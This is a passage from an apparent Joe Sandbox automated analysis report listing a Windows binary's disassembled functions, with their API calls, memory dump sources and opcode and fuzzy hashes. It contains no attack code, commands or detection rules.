                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 29e67c0d1dc76dd43bede71f3810bb6c2ccee0900b5ee500422a6f52fcdafa3a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9ab1c69c7a30f592e7ea29365db0f92b2fa13a77e3e2bee816705d59aba34b30
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29e67c0d1dc76dd43bede71f3810bb6c2ccee0900b5ee500422a6f52fcdafa3a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF054729943869FD700FFF4ED4EBA437A8A700719F004915B5094E1E2CBF945928F44
                                                                                                                                                                                                                                                                                                    Function 00A1CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00A1CEEE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7ff79ddff37878ae580725f430a3e6dd2d2e7dacb4f88fe02007c217b89e4a49
                                                                                                                                                                                                                                                                                                    • Instruction ID: 246896dea34f7c4ac6a02803bcb0524683691bd853dd61ec5b05dc5ae0d7785b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ff79ddff37878ae580725f430a3e6dd2d2e7dacb4f88fe02007c217b89e4a49
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D632BE75A44255AFCF20CF58C884EFABBB5FF44364F188069E916AB251D734ED81CB90
                                                                                                                                                                                                                                                                                                    Function 00A97AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3fccb8b0bf1a47a9d1596c18076e8b390cece7d9771b62e44e00b1ec38ce02a7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8e4928c4afb6cd0a86680ea1e0f92b5bf167d0d2e02633d903df8c3a8e15586c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fccb8b0bf1a47a9d1596c18076e8b390cece7d9771b62e44e00b1ec38ce02a7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28D14B75A1420AEFCF14EF98D9819EDBBB5FF48310F144159E915AB291DB30AE81CFA0
                                                                                                                                                                                                                                                                                                    Function 00A3F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 68ffcf9c8cf082988dbe3a8a66e2181d0174e0868f2c7ee5c25de64d1abf8046
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9cd2fb71544eeacbe7d2ec6da731b328384582880002be1bf92a51de44c63c02
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68ffcf9c8cf082988dbe3a8a66e2181d0174e0868f2c7ee5c25de64d1abf8046
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E751B675E10144EFDB10DFA8D841EAA7BB1EF85364F198168F8189B392D731ED42CB90
                                                                                                                                                                                                                                                                                                    Function 00A7FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00A7FCCE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 50dd487ec1a84e7fa6c357f2a5c69a2b998a16dd5733a7b670afe8c81f4eee50
                                                                                                                                                                                                                                                                                                    • Instruction ID: 721037cc2782e6ec47c7b5b72c919518db99629fb6bb7ef5ed4ec63f8ee924f3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50dd487ec1a84e7fa6c357f2a5c69a2b998a16dd5733a7b670afe8c81f4eee50
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E419276500209AFCB21EFA8CC819AEB7F9EF44314B20C53AE91AD7251EB70DB458B50
                                                                                                                                                                                                                                                                                                    Function 00A16679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A1668B,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A1664A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A1665C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1663E: FreeLibrary.KERNEL32(00000000,?,?,00A1668B,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A1666E
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A166AB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A16607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A55657,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A16610
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A16607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A16622
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A16607: FreeLibrary.KERNEL32(00000000,?,?,00A55657,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A16635
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8ac324affc3f13bb9c19852072c8a693b4e0dd6f1b4f4b47f50423fcadec1cd9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 603a675c29afb2c0df48eac6a2cc78cfe2ef3dcb7b09b92f9d5d9e0b85dd3cb6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ac324affc3f13bb9c19852072c8a693b4e0dd6f1b4f4b47f50423fcadec1cd9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411C172600205AACF18EB70CA02BEDBBA5AF50711F10482DF492E61C2EEB59A85DB50
                                                                                                                                                                                                                                                                                                    Function 00A48782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e75a9bfbf1379d09712dbc9268c88f17887b70223af7a7c1e356a25e8f7fa3fa
                                                                                                                                                                                                                                                                                                    • Instruction ID: ea077310edef1d0f379642d3b368c983b00d852cbe7ecc0ecde7bc750402618c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e75a9bfbf1379d09712dbc9268c88f17887b70223af7a7c1e356a25e8f7fa3fa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E711187690410AAFCF05DF98E94599E7BF4EF88310F114069F809AB311DA31EA118B65
                                                                                                                                                                                                                                                                                                    Function 00A45373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A44FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A4319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A45031
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A453DF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8b7a8c3297fc2ccf327390626cc48e5c7694b54eee0d22cce6aea98894dcb4f7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E0149766003046BE331CF69D881A5AFBEDEBC5370F65052DE58487281EB70B805C774
                                                                                                                                                                                                                                                                                                    Function 00A3E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                    • Instruction ID: c2b5f92358ae6b6421bd6d343cc79a544024940d364dc212988cbb8893723989
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0C836511A209BD6327A7BED06B5B77988FC2334F100726F925D71D2EB74E80287D2
                                                                                                                                                                                                                                                                                                    Function 00A1B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 52c1707e336194a45f771f764fbc73456d4cc77271d71f1d52bdeb15cf858989
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92F0C8B36017046ED7149F28D806FA7BBA8EB44760F10822AFA19CF5D1DB31E560CBA0
                                                                                                                                                                                                                                                                                                    Function 00A44FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A4319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A45031
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 074eeb6c17ce429474fe0eb4bbf11f8602bb9d13a92fc22c034f324c756929f5
                                                                                                                                                                                                                                                                                                    • Instruction ID: ff579284e2e4929a1f510f703125376938e0065effa6f885aef145876458ff80
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 074eeb6c17ce429474fe0eb4bbf11f8602bb9d13a92fc22c034f324c756929f5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F0BE3EE10E20AF9B316B76DC02B5A3758AFC17A0F158021B804DB092EB70DD018AE0
                                                                                                                                                                                                                                                                                                    Function 00A43B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A36A79,?,0000015D,?,?,?,?,00A385B0,000000FF,00000000,?,?), ref: 00A43BC5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e639faa5a9b42d2df594e9882e6cd855c704744e68248c169ee37dc1989e3c1a
                                                                                                                                                                                                                                                                                                    • Instruction ID: fbb09e9632e099f4b38c9bc5824cf76f20de327324a4cb3b8322cb8a8b090e3d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e639faa5a9b42d2df594e9882e6cd855c704744e68248c169ee37dc1989e3c1a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DE06D3BA50621A6DE2177B69C02B9B3A5CEF813A0F150161FC659EA91DB60CE4286A1
                                                                                                                                                                                                                                                                                                    Function 00A166E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 52fb14d83e7456480f2b2d3da2eed8f65f1fb53883c9d69b62fb7a4912749c0c
                                                                                                                                                                                                                                                                                                    • Instruction ID: db50e511969ffb94f04a0d0dde540980ec95a7a318298c0fc54633ca27e91867
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52fb14d83e7456480f2b2d3da2eed8f65f1fb53883c9d69b62fb7a4912749c0c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF0A9B0400702CFCB348F64D8A0892BBF0BF0432A3248A7EE5D786A10C7329884DF10
                                                                                                                                                                                                                                                                                                    Function 00A66AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
